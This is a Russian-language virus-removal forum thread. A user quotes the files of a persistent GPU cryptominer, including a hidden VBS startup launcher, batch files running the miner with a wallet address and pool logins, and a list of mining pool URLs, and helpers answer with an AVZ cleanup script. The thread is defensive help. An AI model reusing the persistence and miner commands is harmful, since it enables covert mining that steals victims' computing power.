nvvsnc.exe - "miner" вернулся...

Windows 7 x64
_____________

BitCoinMiner который уже не первый раз удалял с компьютера снова вернулся.
При попытке удалить его, вместе со всеми файлами которые к нему привязаны, всё возвращается после перезагрузки компьютера.

Сам процесс nvvsnc.exe процессор не грузит, но при этом система охлаждения работает достаточно "громко" - другими словами, он загружает видеокарту.

Файлы:
C:\Windows\SysWOW64\
-nvvsnc.exe
-nvvsnc.bat
-Start.vbs
-Start.bat
-Star.bat
-listm.txt
-pools.txt
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
-Start.vbs

Текст в файлах:
-Start.vbs (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\)
[CODE]Set oShell = Wscript.CreateObject("WScript.Shell")CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\nvvsnc.bat"
oShell.Run CommandLine, 0, 0
REM Update Gpu[/CODE]
(C:\Windows\SysWOW64\)
[CODE]Set oShell = Wscript.CreateObject("WScript.Shell")CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\Start.bat"
oShell.Run CommandLine, 0, 0[/CODE]

-Start.bat
[CODE]c:\Windows\SysWOW64\nvdrive.exe -dbg -1 -lowcpu 2 -u 49ZuQzYVYBr6yy6hPiHPYa5i7iJN9nJMvKBDZs5b4VSR7R5w8mwr3ssdbMupL1bpaXaEXHwvFsXvNjTAL4pCCWZhE2iaA9K -p x[/CODE]

-Star.bat
[CODE]echo offdel C:\Windows\System32\nvvsnc.vbs
del C:\Windows\SysWOW64\nvvsnc.vbs
end[/CODE]

-nvvsnc.bat
[CODE]c:\windows\syswow64\nvvsnc.exe -a x11 -i 12 -o stratum+tcp://europe1.darkcoin.miningpoolhub.com:20465 -u nimb1982.3 -p x [/CODE]

-listm.txt
[CODE]письмо AGPU[/CODE]

-pools.txt
[CODE]stratum+tcp://xmr.hashinvest.net:5555stratum+tcp://mine.moneropool.org:80
stratum+tcp://mine.cryptoescrow.eu:3333
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://mine.moneropool.com.br:3333
stratum+tcp://xmr.cryptograben.com:7777[/CODE]

Единственное к чему могу всё это привязать, так это utorrent - за долгое время, вчера первый раз включил и вся эта гадость поползла (в данный момент программу удалил).

Уважаемый(ая) [B]omnicron[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Выполните скрипт в AVZ
[code]begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
TerminateProcessByName('c:\windows\syswow64\nvvsnc.exe');
QuarantineFile('c:\windows\syswow64\nvvsnc.exe','');
DeleteFile('c:\windows\syswow64\nvvsnc.exe','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.[/code]Компьютер перезагрузится.

Пришлите карантин согласно [B]Приложения 2[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы

[B][COLOR="Blue"]Сделайте новые логи по правилам[/COLOR][/B]


Сделайте лог [url="http://virusinfo.info/showthread.php?t=53070&p=1104657&viewfull=1#post1104657"]полного сканирования МВАМ[/url]

Выгрузил карантин и логи.
Пока-что всё тихо. Если дальнейших указаний не будет, то попробую удалить оставшиеся файлы и подчистить регистр, после чего отпишусь о результатах (в основном, все эти файлы сразу возвращаются после удаления), а до этого буду ожидать ответа.

[quote="omnicron;1245870"]Start.vbs
-Start.bat
-Star.bat
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe[/quote]Заархивируйте с паролем virus и пришлите в карантин

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

[quote="omnicron;1245870"]Start.vbs
-Start.bat
-Star.bat
-run.exe
-Update_2.exe
-Update_3.exe
-Update_5.exe
-Update_7.exe
-Update_35.exe[/quote]Заархивируйте с паролем virus и пришлите в карантин

Архив отослал.

И так...прошло 10 дней и новых указаний не было - удалили файлы вручную. Результат: они пока-что не вернулись.
Но всё-таки без странностей не обходиться. Ещё до удаления, последние пару дней, соединение с сайтами было медленным (хоть это может быть связано с моим провайдером), а также, за мгновение до удаления файлов, C:\Windows\SysWOW64\Softlic.exe повёл себя странно - зажрал под себя 25% процессора и начал поедать без остановки оперативную память. К этому файлу я и так отношусь с недоверием (появился в тоже время что и майнер; нету программы к которой его можно привязать; сведений о нём тоже нету; к тому-же это х32 системный процесс в х64 винде), а тут ещё и приколы с процессором и оперативкою.

Проверьте на virustotal.com и пришлите ссылку

Вот результат проверки:
[url]https://www.virustotal.com/uk/file/200b479932700842be0bea65aa99a077f58216408a2fce949f1d392a3e16e436/analysis/[/url]

Также вернулся C:\Windows\SysWOW64\Update_CPU.exe которого раньше удалял антивирус...

Присылайте оба файла в архиве по красной ссылке

Архив выгрузил. Пароль стандартный: virus.

Дальнейшие указания будут?

Ответа из вирлаба нет

То есть?

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]3[/B][*]Обработано файлов: [B]14[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]